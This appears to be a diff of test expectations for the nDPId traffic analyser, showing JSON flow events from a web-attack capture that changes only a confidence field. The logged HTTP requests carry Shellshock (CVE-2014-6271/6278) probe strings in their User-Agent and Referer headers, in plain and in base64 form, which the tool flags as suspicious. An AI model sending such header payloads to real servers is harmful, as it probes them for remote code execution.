00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 